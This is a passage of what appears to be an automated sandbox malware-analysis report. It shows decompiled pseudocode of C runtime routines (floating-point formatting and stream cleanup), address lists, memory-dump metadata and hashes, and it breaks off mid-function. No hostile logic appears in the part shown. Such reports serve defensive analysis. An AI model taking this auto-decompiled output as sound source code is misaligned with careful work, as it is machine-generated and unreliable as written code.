                																	 *(_t1271 + _t1257 * 4 - 0x3a0) = _t965 *  *(_t1271 + _t1257 * 4 - 0x3a0) + _t1108;
                																	asm("adc edx, 0x0");
                																	_t1257 = _t1257 + 1;
                																	_t1108 = _t1165;
                																	__eflags = _t1257 - _v1884;
                																} while (_t1257 != _v1884);
                																L149:
                																__eflags = _t1107;
                																if(_t1107 == 0) {
                																	goto L180;
                																} else {
                																	_t961 = _v936;
                																	__eflags = _t961 - 0x73;
                																	if(_t961 < 0x73) {
                																		 *(_t1271 + _t961 * 4 - 0x3a0) = _t1107;
                																		_v936 = _v936 + 1;
                																		goto L180;
                																	} else {
                																		_v1400 = 0;
                																		_v936 = 0;
                																		_push(0);
                																		_t940 =  &_v1396;
                																		L188:
                																		_push(_t940);
                																		_push(_t1064);
                																		_push( &_v932);
                																		E003FBDE1();
                																		_t1277 =  &(_t1277[4]);
                																		_t933 = 0;
                																	}
                																}
                															}
                														}
                													} else {
                														_t929 = 0;
                														_v1864 = 0;
                														_v936 = 0;
                														L178:
                														_push(_t929);
                														_t930 =  &_v1860;
                														L179:
                														_push(_t930);
                														_push(_t1064);
                														_push( &_v932);
                														E003FBDE1();
                														_t1277 =  &(_t1277[4]);
                														L180:
                														_t933 = 1;
                													}
                												}
                												L181:
                												__eflags = _t933;
                												if(_t933 == 0) {
                													_v2408 = _v2408 & 0x00000000;
                													_t404 =  &_v936;
                													 *_t404 = _v936 & 0x00000000;
                													__eflags =  *_t404;
                													_push(0);
                													L190:
                													_push( &_v2404);
                													_t852 =  &_v932;
                													L262:
                													_push(_t1064);
                													_push(_t852);
                													E003FBDE1();
                													_t1277 =  &(_t1277[4]);
                												} else {
                													goto L182;
                												}
                												goto L263;
                												L182:
                												_t908 = _v1908 - _v1888;
                												__eflags = _t908;
                												_v1908 = _t908;
                											} while (_t908 != 0);
                											_t1102 = _v1896;
                											goto L184;
                										}
                									}
                									L263:
                									_t1194 = _v1920;
                									_t1243 = _t1194;
                									_t1086 = _v472;
                									_v1872 = _t1243;
                									__eflags = _t1086;
                									if(_t1086 != 0) {
                										_t1247 = 0;
                										_t1198 = 0;
                										__eflags = 0;
                										do {
                											_t841 =  *(_t1271 + _t1198 * 4 - 0x1d0);
                											_t1151 = 0xa;
                											_t1152 = _t841 * _t1151 >> 0x20;
                											 *(_t1271 + _t1198 * 4 - 0x1d0) = _t841 * _t1151 + _t1247;
                											asm("adc edx, 0x0");
                											_t1198 = _t1198 + 1;
                											_t1247 = _t1152;
                											__eflags = _t1198 - _t1086;
                										} while (_t1198 != _t1086);
                										_v1896 = _t1247;
                										__eflags = _t1247;
                										_t1243 = _v1872;
                										if(_t1247 != 0) {
                											_t1095 = _v472;
                											__eflags = _t1095 - 0x73;
                											if(_t1095 >= 0x73) {
                												__eflags = 0;
                												_v2408 = 0;
                												_v472 = 0;
                												E003FBDE1( &_v468, _t1064,  &_v2404, 0);
                												_t1277 =  &(_t1277[4]);
                											} else {
                												 *(_t1271 + _t1095 * 4 - 0x1d0) = _t1152;
                												_v472 = _v472 + 1;
                											}
                										}
                										_t1194 = _t1243;
                									}
                									_t815 = E003FD440( &_v472,  &_v936);
                									_t1142 = 0xa;
                									__eflags = _t815 - _t1142;
                									if(_t815 != _t1142) {
                										__eflags = _t815;
                										if(_t815 != 0) {
                											_t816 = _t815 + 0x30;
                											__eflags = _t816;
                											_t1243 = _t1194 + 1;
                											 *_t1194 = _t816;
                											_v1872 = _t1243;
                											goto L282;
                										} else {
                											_t817 = _v1904 - 1;
                										}
                									} else {
                										_v1904 = _v1904 + 1;
                										_t1243 = _t1194 + 1;
                										_t832 = _v936;
                										 *_t1194 = 0x31;
                										_v1872 = _t1243;
                										__eflags = _t832;
                										if(_t832 != 0) {
                											_t1197 = 0;
                											_t1246 = _t832;
                											_t1094 = 0;
                											__eflags = 0;
                											do {
                												_t833 =  *(_t1271 + _t1094 * 4 - 0x3a0);
                												 *(_t1271 + _t1094 * 4 - 0x3a0) = _t833 * _t1142 + _t1197;
                												asm("adc edx, 0x0");
                												_t1094 = _t1094 + 1;
                												_t1197 = _t833 * _t1142 >> 0x20;
                												_t1142 = 0xa;
                												__eflags = _t1094 - _t1246;
                											} while (_t1094 != _t1246);
                											_t1243 = _v1872;
                											__eflags = _t1197;
                											if(_t1197 != 0) {
                												_t836 = _v936;
                												__eflags = _t836 - 0x73;
                												if(_t836 >= 0x73) {
                													_v2408 = 0;
                													_v936 = 0;
                													E003FBDE1( &_v932, _t1064,  &_v2404, 0);
                													_t1277 =  &(_t1277[4]);
                												} else {
                													 *(_t1271 + _t836 * 4 - 0x3a0) = _t1197;
                													_v936 = _v936 + 1;
                												}
                											}
                										}
                										L282:
                										_t817 = _v1904;
                									}
                									 *((intOrPtr*)(_v1924 + 4)) = _t817;
                									_t1070 = _v1916;
                									__eflags = _t817;
                									if(_t817 >= 0) {
                										__eflags = _t1070 - 0x7fffffff;
                										if(_t1070 <= 0x7fffffff) {
                											_t1070 = _t1070 + _t817;
                											__eflags = _t1070;
                										}
                									}
                									_t819 = _a24 - 1;
                									__eflags = _t819 - _t1070;
                									if(_t819 >= _t1070) {
                										_t819 = _t1070;
                									}
                									_t755 = _t819 + _v1920;
                									_v1916 = _t755;
                									__eflags = _t1243 - _t755;
                									if(__eflags != 0) {
                										while(1) {
                											_t755 = _v472;
                											__eflags = _t755;
                											if(__eflags == 0) {
                												goto L303;
                											}
                											_t1195 = 0;
                											_t1244 = _t755;
                											_t1090 = 0;
                											__eflags = 0;
                											do {
                												_t820 =  *(_t1271 + _t1090 * 4 - 0x1d0);
                												 *(_t1271 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1195;
                												asm("adc edx, 0x0");
                												_t1090 = _t1090 + 1;
                												_t1195 = _t820 * 0x3b9aca00 >> 0x20;
                												__eflags = _t1090 - _t1244;
                											} while (_t1090 != _t1244);
                											_t1245 = _v1872;
                											__eflags = _t1195;
                											if(_t1195 != 0) {
                												_t826 = _v472;
                												__eflags = _t826 - 0x73;
                												if(_t826 >= 0x73) {
                													__eflags = 0;
                													_v2408 = 0;
                													_v472 = 0;
                													E003FBDE1( &_v468, _t1064,  &_v2404, 0);
                													_t1277 =  &(_t1277[4]);
                												} else {
                													 *(_t1271 + _t826 * 4 - 0x1d0) = _t1195;
                													_v472 = _v472 + 1;
                												}
                											}
                											_t825 = E003FD440( &_v472,  &_v936);
                											_t1196 = 8;
                											_t1070 = _v1916 - _t1245;
                											__eflags = _t1070;
                											do {
                												_t708 = _t825 % _v1912;
                												_t825 = _t825 / _v1912;
                												_t1142 = _t708 + 0x30;
                												__eflags = _t1070 - _t1196;
                												if(_t1070 >= _t1196) {
                													 *(_t1196 + _t1245) = _t1142;
                												}
                												_t1196 = _t1196 - 1;
                												__eflags = _t1196 - 0xffffffff;
                											} while (_t1196 != 0xffffffff);
                											__eflags = _t1070 - 9;
                											if(_t1070 > 9) {
                												_t1070 = 9;
                											}
                											_t1243 = _t1245 + _t1070;
                											_v1872 = _t1243;
                											__eflags = _t1243 - _v1916;
                											if(__eflags != 0) {
                												continue;
                											}
                											goto L303;
                										}
                									}
                									L303:
                									 *_t1243 = 0;
                									goto L309;
                								}
                							}
                						}
                					}
                				} else {
                					_t1070 = _t1234 & 0x000fffff;
                					if((_t1186 | _t1234 & 0x000fffff) != 0) {
                						goto L5;
                					} else {
                						_push(0x408404);
                						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
                						L308:
                						_push(_a24);
                						_push(_t1055);
                						if(E003F8D67() != 0) {
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							E003F9097();
                							asm("int3");
                							_push(0x10);
                							E003EF5F0(_t1055, _t1186, _t1234);
                							_v32 = _v32 & 0x00000000;
                							E003FAC31(8);
                							_t1071 = 0x40c4e8;
                							_t721 =  &_v8;
                							 *_t721 = _v8 & 0x00000000;
                							__eflags =  *_t721;
                							_t1235 = 3;
                							while(1) {
                								_v36 = _t1235;
                								__eflags = _t1235 -  *0x432274; // 0x200
                								if(__eflags == 0) {
                									break;
                								}
                								_t763 =  *0x432278; // 0x0
                								_t764 =  *(_t763 + _t1235 * 4);
                								__eflags = _t764;
                								if(_t764 != 0) {
                									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
                									if(__eflags != 0) {
                										_t773 =  *0x432278; // 0x0
                										_push( *((intOrPtr*)(_t773 + _t1235 * 4)));
                										_t774 = E00400023(_t1055, _t1071, _t1142, _t1186, _t1235, __eflags);
                										__eflags = _t774 - 0xffffffff;
                										if(_t774 != 0xffffffff) {
                											_t731 =  &_v32;
                											 *_t731 = _v32 + 1;
                											__eflags =  *_t731;
                										}
                									}
                									_t767 =  *0x432278; // 0x0
                									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1235 * 4)) + 0x20);
                									_t770 =  *0x432278; // 0x0
                									E003F8DCC( *((intOrPtr*)(_t770 + _t1235 * 4)));
                									_pop(_t1071);
                									_t772 =  *0x432278; // 0x0
                									_t737 = _t772 + _t1235 * 4;
                									 *_t737 =  *(_t772 + _t1235 * 4) & 0x00000000;
                									__eflags =  *_t737;
                								}
                								_t1235 = _t1235 + 1;
                							}
                							_v8 = 0xfffffffe;
                							E003FED21();
                							return E003EF640(_v32);
                						} else {
                							L309:
                							_t1284 = _v1936;
                							_pop(_t1187);
                							_pop(_t1236);
                							_pop(_t1056);
                							if(_v1936 != 0) {
                								_t755 = E003FF381(_t1070, _t1284,  &_v1944);
                							}
                							return E003EFBBC(_t755, _t1056, _v8 ^ _t1271, _t1142, _t1187, _t1236);
                						}
                					}
                				}
                			}

                0x003fdcbf
                0x003fdcc5
                0x003fdccb
                0x003fdcd0
                0x003fdcd7
                0x003fdcd8
                0x003fdcd8
                0x003fdcd8
                0x003fdcdf
                0x003fdce2
                0x003fdcea
                0x003fdcf0
                0x003fdcf5
                0x003fdcf5
                0x003fdcf2
                0x003fdcf2
                0x003fdcf2
                0x003fdcf9
                0x003fdcfa
                0x003fdcfc
                0x003fdcff
                0x003fdd05
                0x003fdd0b
                0x003fdd0e
                0x003fdd11
                0x003fdd17
                0x003fdd1a
                0x003fdd1d
                0x003fdd27
                0x003fdd27
                0x003fdd27
                0x003fdd1f
                0x003fdd1f
                0x003fdd21
                0x00000000
                0x003fdd23
                0x003fdd23
                0x003fdd23
                0x003fdd21
                0x003fdd29
                0x003fdd2b
                0x003fde1d
                0x003fde1d
                0x003fde1f
                0x003fde25
                0x003fde2b
                0x003fde40
                0x003fde45
                0x003fdd31
                0x003fdd31
                0x003fdd33
                0x00000000
                0x003fdd39
                0x003fdd3b
                0x003fdd3c
                0x003fdd3e
                0x003fdd40
                0x003fdd42
                0x003fdd42
                0x003fdd48
                0x003fdd4a
                0x003fdd50
                0x003fdd53
                0x003fdd61
                0x003fdd67
                0x003fdd67
                0x003fdd69
                0x003fdd6c
                0x003fdd72
                0x003fdd72
                0x003fdd74
                0x00000000
                0x00000000
                0x003fdd76
                0x003fdd78
                0x003fdd7e
                0x003fdd7e
                0x003fdd7a
                0x003fdd7a
                0x003fdd7a
                0x003fdd83
                0x003fdd85
                0x003fdd8c
                0x003fdd8c
                0x003fdd87
                0x003fdd87
                0x003fdd87
                0x003fddb2
                0x003fddb8
                0x003fddbb
                0x003fddc1
                0x003fddc8
                0x003fddc9
                0x003fddca
                0x003fddd0
                0x003fddd3
                0x003fddd5
                0x00000000
                0x003fddd5
                0x00000000
                0x003fddd3
                0x003fdddd
                0x003fdde3
                0x003fddeb
                0x003fddeb
                0x003fddec
                0x003fddee
                0x003fddf2
                0x003fddfa
                0x003fddfa
                0x003fddfa
                0x003fddfc
                0x003fde03
                0x003fde08
                0x003fde15
                0x003fde0a
                0x003fde0d
                0x003fde0d
                0x003fde08
                0x003fdd33
                0x003fde48
                0x003fde52
                0x003fde58
                0x003fde5e
                0x003fde64
                0x003fdaa0
                0x003fdaa0
                0x003fdaa0
                0x003fdaa2
                0x003fdaa9
                0x003fdab0
                0x00000000
                0x00000000
                0x003fdab6
                0x003fdab9
                0x003fdabc
                0x00000000
                0x003fdabe
                0x003fdac6
                0x003fdacb
                0x003fdad0
                0x003fdad1
                0x003fdad3
                0x003fdadb
                0x003fdadf
                0x003fdae5
                0x003fdaeb
                0x003fdaf0
                0x003fdaf7
                0x003fdaf7
                0x003fdaf8
                0x003fdafb
                0x003fdb03
                0x003fdb09
                0x003fdb0e
                0x003fdb0e
                0x003fdb0b
                0x003fdb0b
                0x003fdb0b
                0x003fdb12
                0x003fdb13
                0x003fdb15
                0x003fdb18
                0x003fdb1e
                0x003fdb24
                0x003fdb27
                0x003fdb2a
                0x003fdb30
                0x003fdb33
                0x003fdb36
                0x003fdb40
                0x003fdb40
                0x003fdb40
                0x003fdb38
                0x003fdb38
                0x003fdb3a
                0x00000000
                0x003fdb3c
                0x003fdb3c
                0x003fdb3c
                0x003fdb3a
                0x003fdb42
                0x003fdb44
                0x003fdc39
                0x003fdc39
                0x003fdc3b
                0x003fdc41
                0x003fdc47
                0x003fdc5c
                0x003fdc61
                0x003fdb4a
                0x003fdb4a
                0x003fdb4c
                0x00000000
                0x003fdb52
                0x003fdb54
                0x003fdb55
                0x003fdb57
                0x003fdb59
                0x003fdb5b
                0x003fdb5b
                0x003fdb61
                0x003fdb63
                0x003fdb69
                0x003fdb6c
                0x003fdb7a
                0x003fdb80
                0x003fdb80
                0x003fdb82
                0x003fdb85
                0x003fdb8b
                0x003fdb8b
                0x003fdb8d
                0x00000000
                0x00000000
                0x003fdb8f
                0x003fdb91
                0x003fdb97
                0x003fdb97
                0x003fdb93
                0x003fdb93
                0x003fdb93
                0x003fdb9c
                0x003fdb9e
                0x003fdbab
                0x003fdbab
                0x003fdba0
                0x003fdba6
                0x003fdba6
                0x003fdbc9
                0x003fdbd1
                0x003fdbd8
                0x003fdbdf
                0x003fdbe0
                0x003fdbe3
                0x003fdbe9
                0x003fdbef
                0x003fdbf2
                0x003fdbf4
                0x00000000
                0x003fdbf4
                0x00000000
                0x003fdbf2
                0x003fdbfc
                0x003fdc02
                0x003fdc02
                0x003fdc08
                0x003fdc0a
                0x003fdc14
                0x003fdc16
                0x003fdc16
                0x003fdc16
                0x003fdc18
                0x003fdc1f
                0x003fdc24
                0x003fdc31
                0x003fdc26
                0x003fdc29
                0x003fdc29
                0x003fdc24
                0x003fdb4c
                0x003fdc64
                0x003fdc6f
                0x003fdc70
                0x003fdc71
                0x003fdc77
                0x003fdc7d
                0x003fdc83
                0x003fdc83
                0x00000000
                0x003fdabc
                0x00000000
                0x003fdaa2
                0x003fdc84
                0x003fdc8a
                0x003fdc91
                0x003fdc92
                0x003fdc93
                0x003fdc98
                0x003fdc98
                0x003fe0fc
                0x003fe106
                0x003fe107
                0x003fe10d
                0x003fe10f
                0x003fe578
                0x003fe57a
                0x003fe57c
                0x003fe582
                0x003fe584
                0x003fe58a
                0x003fe58c
                0x003fe8de
                0x003fe8de
                0x003fe8e0
                0x003fe8e6
                0x003fe8ed
                0x003fe8f3
                0x003fe8f5
                0x003fe993
                0x003fe993
                0x003fe995
                0x003fe996
                0x003fe99c
                0x00000000
                0x003fe8fb
                0x003fe8fb
                0x003fe8fe
                0x003fe904
                0x003fe90a
                0x003fe90c
                0x003fe912
                0x003fe914
                0x003fe914
                0x003fe916
                0x003fe916
                0x003fe91f
                0x003fe926
                0x003fe92c
                0x003fe92f
                0x003fe930
                0x003fe932
                0x003fe932
                0x003fe936
                0x003fe938
                0x003fe93a
                0x003fe940
                0x003fe943
                0x00000000
                0x003fe945
                0x003fe945
                0x003fe94c
                0x003fe94c
                0x003fe943
                0x003fe938
                0x003fe90c
                0x003fe8fe
                0x003fe8f5
                0x003fe592
                0x003fe592
                0x003fe592
                0x003fe595
                0x003fe599
                0x003fe599
                0x003fe59a
                0x003fe5ac
                0x003fe5b9
                0x003fe5c8
                0x003fe5f2
                0x003fe5f7
                0x003fe5fd
                0x003fe600
                0x003fe606
                0x003fe609
                0x003fe6a2
                0x003fe6a9
                0x003fe727
                0x003fe72d
                0x003fe733
                0x003fe736
                0x003fe738
                0x003fe7c1
                0x003fe73e
                0x003fe73e
                0x003fe744
                0x003fe744
                0x003fe74a
                0x003fe750
                0x003fe752
                0x003fe754
                0x003fe754
                0x003fe75a
                0x003fe760
                0x003fe762
                0x003fe76a
                0x003fe76a
                0x003fe770
                0x003fe772
                0x003fe774
                0x003fe77a
                0x003fe77c
                0x003fe893
                0x003fe895
                0x003fe89b
                0x003fe89b
                0x003fe89e
                0x003fe89f
                0x00000000
                0x003fe782
                0x003fe788
                0x003fe788
                0x003fe78a
                0x003fe790
                0x003fe793
                0x003fe79a
                0x003fe7a0
                0x003fe7a2
                0x003fe7c9
                0x003fe7cb
                0x003fe7cd
                0x003fe7cf
                0x003fe7d5
                0x003fe7db
                0x003fe875
                0x003fe875
                0x003fe878
                0x00000000
                0x003fe87e
                0x003fe87e
                0x003fe884
                0x00000000
                0x003fe884
                0x003fe7e1
                0x003fe7e1
                0x003fe7e1
                0x003fe7e4
                0x00000000
                0x00000000
                0x003fe7e6
                0x003fe7e8
                0x003fe7ea
                0x003fe7f3
                0x003fe7f3
                0x003fe7f5
                0x003fe7fb
                0x003fe7fb
                0x003fe807
                0x003fe812
                0x003fe815
                0x003fe822
                0x003fe825
                0x003fe826
                0x003fe827
                0x003fe82d
                0x003fe82f
                0x003fe835
                0x003fe83b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe83d
                0x003fe83d
                0x003fe83d
                0x003fe83f
                0x00000000
                0x00000000
                0x003fe841
                0x003fe844
                0x00000000
                0x003fe84a
                0x003fe84a
                0x003fe84c
                0x003fe84e
                0x003fe84e
                0x003fe84e
                0x003fe856
                0x003fe859
                0x003fe859
                0x003fe85f
                0x003fe861
                0x003fe863
                0x003fe86a
                0x003fe870
                0x003fe872
                0x00000000
                0x003fe872
                0x00000000
                0x003fe844
                0x00000000
                0x003fe83d
                0x00000000
                0x003fe7e1
                0x003fe7a4
                0x003fe7a4
                0x003fe7a6
                0x003fe7ac
                0x003fe7b3
                0x003fe7b3
                0x003fe7b6
                0x003fe7b6
                0x00000000
                0x003fe7a6
                0x00000000
                0x003fe88a
                0x003fe88a
                0x003fe88b
                0x003fe88b
                0x00000000
                0x003fe790
                0x003fe6ab
                0x003fe6ab
                0x003fe6bd
                0x003fe6cc
                0x003fe6d1
                0x003fe6d4
                0x003fe6d6
                0x00000000
                0x003fe6dc
                0x003fe6dc
                0x003fe6df
                0x00000000
                0x003fe6e5
                0x003fe6e5
                0x003fe6ec
                0x00000000
                0x003fe6f2
                0x003fe6f8
                0x003fe6fa
                0x003fe700
                0x003fe700
                0x003fe702
                0x003fe702
                0x003fe704
                0x003fe70d
                0x003fe714
                0x003fe717
                0x003fe718
                0x003fe71a
                0x003fe71a
                0x00000000
                0x003fe722
                0x003fe6ec
                0x003fe6df
                0x003fe6d6
                0x003fe60f
                0x003fe60f
                0x003fe615
                0x003fe617
                0x003fe633
                0x003fe636
                0x00000000
                0x003fe63c
                0x003fe63c
                0x003fe643
                0x00000000
                0x003fe649
                0x003fe64f
                0x003fe651
                0x003fe657
                0x003fe657
                0x003fe659
                0x003fe659
                0x003fe65b
                0x003fe664
                0x003fe66b
                0x003fe66e
                0x003fe66f
                0x003fe671
                0x003fe671
                0x003fe679
                0x003fe679
                0x003fe67b
                0x00000000
                0x003fe681
                0x003fe681
                0x003fe687
                0x003fe68a
                0x003fe954
                0x003fe957
                0x003fe95d
                0x003fe972
                0x003fe977
                0x003fe97a
                0x003fe690
                0x003fe690
                0x003fe697
                0x00000000
                0x003fe697
                0x003fe68a
                0x003fe67b
                0x003fe643
                0x003fe619
                0x003fe619
                0x003fe61b
                0x003fe621
                0x003fe627
                0x003fe628
                0x003fe8a5
                0x003fe8a5
                0x003fe8ac
                0x003fe8ad
                0x003fe8ae
                0x003fe8b3
                0x003fe8b6
                0x003fe8b6
                0x003fe8b6
                0x003fe617
                0x003fe8b8
                0x003fe8b8
                0x003fe8ba
                0x003fe981
                0x003fe988
                0x003fe98f
                0x003fe9a2
                0x003fe9a8
                0x003fe9a9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe8c0
                0x003fe8c6
                0x003fe8c6
                0x003fe8cc
                0x003fe8cc
                0x003fe8d8
                0x00000000
                0x003fe8d8
                0x003fe115
                0x003fe115
                0x003fe117
                0x003fe11d
                0x003fe11f
                0x003fe125
                0x003fe127
                0x003fe49e
                0x003fe49e
                0x003fe4a0
                0x003fe4a6
                0x003fe4ad
                0x003fe4af
                0x003fe50e
                0x003fe511
                0x003fe517
                0x003fe51d
                0x003fe523
                0x003fe525
                0x003fe52b
                0x003fe52d
                0x003fe52d
                0x003fe52f
                0x003fe52f
                0x003fe531
                0x003fe53a
                0x003fe541
                0x003fe544
                0x003fe545
                0x003fe547
                0x003fe547
                0x003fe54f
                0x003fe551
                0x003fe557
                0x003fe55d
                0x003fe560
                0x00000000
                0x003fe566
                0x003fe566
                0x003fe56d
                0x003fe56d
                0x003fe560
                0x003fe551
                0x003fe525
                0x003fe4b1
                0x003fe4b1
                0x003fe4b3
                0x003fe4b9
                0x003fe4bf
                0x00000000
                0x003fe4bf
                0x003fe4af
                0x003fe12d
                0x003fe12d
                0x003fe12d
                0x003fe130
                0x003fe134
                0x003fe134
                0x003fe135
                0x003fe147
                0x003fe154
                0x003fe163
                0x003fe18d
                0x003fe192
                0x003fe198
                0x003fe19b
                0x003fe1a1
                0x003fe1a4
                0x003fe220
                0x003fe227
                0x003fe2eb
                0x003fe2f1
                0x003fe2f7
                0x003fe2fa
                0x003fe2fc
                0x003fe385
                0x003fe302
                0x003fe302
                0x003fe308
                0x003fe308
                0x003fe30e
                0x003fe314
                0x003fe316
                0x003fe318
                0x003fe318
                0x003fe31e
                0x003fe324
                0x003fe326
                0x003fe32e
                0x003fe32e
                0x003fe334
                0x003fe336
                0x003fe338
                0x003fe33e
                0x003fe340
                0x003fe457
                0x003fe459
                0x003fe45f
                0x003fe45f
                0x00000000
                0x003fe346
                0x003fe34c
                0x003fe34c
                0x003fe34e
                0x003fe354
                0x003fe357
                0x003fe35e
                0x003fe364
                0x003fe366
                0x003fe38d
                0x003fe38f
                0x003fe391
                0x003fe393
                0x003fe399
                0x003fe39f
                0x003fe439
                0x003fe439
                0x003fe43c
                0x00000000
                0x003fe442
                0x003fe442
                0x003fe448
                0x00000000
                0x003fe448
                0x003fe3a5
                0x003fe3a5
                0x003fe3a5
                0x003fe3a8
                0x00000000
                0x00000000
                0x003fe3aa
                0x003fe3ac
                0x003fe3ae
                0x003fe3b7
                0x003fe3b7
                0x003fe3b9
                0x003fe3bf
                0x003fe3bf
                0x003fe3cb
                0x003fe3d6
                0x003fe3d9
                0x003fe3e6
                0x003fe3e9
                0x003fe3ea
                0x003fe3eb
                0x003fe3f1
                0x003fe3f3
                0x003fe3f9
                0x003fe3ff
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe401
                0x003fe401
                0x003fe401
                0x003fe403
                0x00000000
                0x00000000
                0x003fe405
                0x003fe408
                0x003fe4c2
                0x003fe4c2
                0x003fe4c4
                0x003fe4ca
                0x003fe4d0
                0x003fe4d1
                0x00000000
                0x003fe40e
                0x003fe40e
                0x003fe410
                0x003fe412
                0x003fe412
                0x003fe412
                0x003fe41a
                0x003fe41d
                0x003fe41d
                0x003fe423
                0x003fe425
                0x003fe427
                0x003fe42e
                0x003fe434
                0x003fe436
                0x00000000
                0x003fe436
                0x00000000
                0x003fe408
                0x00000000
                0x003fe401
                0x00000000
                0x003fe3a5
                0x003fe368
                0x003fe368
                0x003fe36a
                0x003fe370
                0x003fe377
                0x003fe377
                0x003fe37a
                0x003fe37a
                0x00000000
                0x003fe36a
                0x00000000
                0x003fe44e
                0x003fe44e
                0x003fe44f
                0x003fe44f
                0x00000000
                0x003fe354
                0x003fe22d
                0x003fe22d
                0x003fe23f
                0x003fe24e
                0x003fe253
                0x003fe256
                0x003fe258
                0x003fe274
                0x003fe277
                0x00000000
                0x003fe27d
                0x003fe27d
                0x003fe284
                0x00000000
                0x003fe28a
                0x003fe290
                0x003fe292
                0x003fe298
                0x003fe298
                0x003fe29a
                0x003fe29a
                0x003fe29c
                0x003fe2a5
                0x003fe2ac
                0x003fe2af
                0x003fe2b0
                0x003fe2b2
                0x003fe2b2
                0x00000000
                0x003fe29a
                0x003fe284
                0x003fe25a
                0x003fe25c
                0x003fe262
                0x003fe268
                0x003fe269
                0x00000000
                0x003fe269
                0x003fe258
                0x003fe1a6
                0x003fe1a6
                0x003fe1ac
                0x003fe1ae
                0x003fe1c3
                0x003fe1c6
                0x00000000
                0x003fe1cc
                0x003fe1cc
                0x003fe1d3
                0x00000000
                0x003fe1d9
                0x003fe1df
                0x003fe1e1
                0x003fe1e7
                0x003fe1e7
                0x003fe1e9
                0x003fe1e9
                0x003fe1eb
                0x003fe1f4
                0x003fe1fb
                0x003fe1fe
                0x003fe1ff
                0x003fe201
                0x003fe201
                0x003fe2ba
                0x003fe2ba
                0x003fe2bc
                0x00000000
                0x003fe2c2
                0x003fe2c2
                0x003fe2c8
                0x003fe2cb
                0x003fe20e
                0x003fe215
                0x00000000
                0x003fe2d1
                0x003fe2d3
                0x003fe2d9
                0x003fe2df
                0x003fe2e0
                0x003fe4d7
                0x003fe4d7
                0x003fe4de
                0x003fe4df
                0x003fe4e0
                0x003fe4e5
                0x003fe4e8
                0x003fe4e8
                0x003fe2cb
                0x003fe2bc
                0x003fe1d3
                0x003fe1b0
                0x003fe1b0
                0x003fe1b2
                0x003fe1b8
                0x003fe462
                0x003fe462
                0x003fe463
                0x003fe469
                0x003fe469
                0x003fe470
                0x003fe471
                0x003fe472
                0x003fe477
                0x003fe47a
                0x003fe47a
                0x003fe47a
                0x003fe1ae
                0x003fe47c
                0x003fe47c
                0x003fe47e
                0x003fe4ec
                0x003fe4f3
                0x003fe4f3
                0x003fe4f3
                0x003fe4fa
                0x003fe4fc
                0x003fe502
                0x003fe503
                0x003fe9af
                0x003fe9af
                0x003fe9b0
                0x003fe9b1
                0x003fe9b6
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fe480
                0x003fe486
                0x003fe486
                0x003fe48c
                0x003fe48c
                0x003fe498
                0x00000000
                0x003fe498
                0x003fe127
                0x003fe9b9
                0x003fe9b9
                0x003fe9bf
                0x003fe9c1
                0x003fe9c7
                0x003fe9cd
                0x003fe9cf
                0x003fe9d1
                0x003fe9d3
                0x003fe9d3
                0x003fe9d5
                0x003fe9d5
                0x003fe9de
                0x003fe9df
                0x003fe9e3
                0x003fe9ea
                0x003fe9ed
                0x003fe9ee
                0x003fe9f0
                0x003fe9f0
                0x003fe9f4
                0x003fe9fa
                0x003fe9fc
                0x003fea02
                0x003fea04
                0x003fea0a
                0x003fea0d
                0x003fea20
                0x003fea23
                0x003fea29
                0x003fea3e
                0x003fea43
                0x003fea0f
                0x003fea11
                0x003fea18
                0x003fea18
                0x003fea0d
                0x003fea46
                0x003fea46
                0x003fea56
                0x003fea5f
                0x003fea60
                0x003fea62
                0x003feaf9
                0x003feafb
                0x003feb06
                0x003feb06
                0x003feb08
                0x003feb0b
                0x003feb0d
                0x00000000
                0x003feafd
                0x003feb03
                0x003feb03
                0x003fea68
                0x003fea68
                0x003fea6e
                0x003fea71
                0x003fea77
                0x003fea7a
                0x003fea80
                0x003fea82
                0x003fea88
                0x003fea8a
                0x003fea8c
                0x003fea8c
                0x003fea8e
                0x003fea8e
                0x003fea9b
                0x003feaa2
                0x003feaa5
                0x003feaa6
                0x003feaa8
                0x003feaa9
                0x003feaa9
                0x003feaad
                0x003feab3
                0x003feab5
                0x003feab7
                0x003feabd
                0x003feac0

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: b41b466513a7b43611569b1ca2d972aaa63dfb34c49e19ed7e0c0baf9181b36e
                • Instruction ID: 91ed1cc6f4fd2d8bad87256f9fdbb9377839899c82da3eadb9e172cc36941097
                • Opcode Fuzzy Hash: b41b466513a7b43611569b1ca2d972aaa63dfb34c49e19ed7e0c0baf9181b36e
                • Instruction Fuzzy Hash: BFC24B71E0862C8FDB26CE28DD447EAB7B9EB44305F1541EAD94DE7250E778AE818F40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E003D32F7(intOrPtr* __ecx, void* __eflags) {
                				void* __ebp;
                				void* _t237;
                				signed int _t240;
                				void* _t246;
                				unsigned int _t248;
                				unsigned int _t252;
                				void* _t253;
                				signed int _t257;
                				char _t269;
                				signed int _t277;
                				signed int _t289;
                				unsigned int _t290;
                				intOrPtr _t291;
                				signed int _t292;
                				signed int _t295;
                				char _t302;
                				signed char _t304;
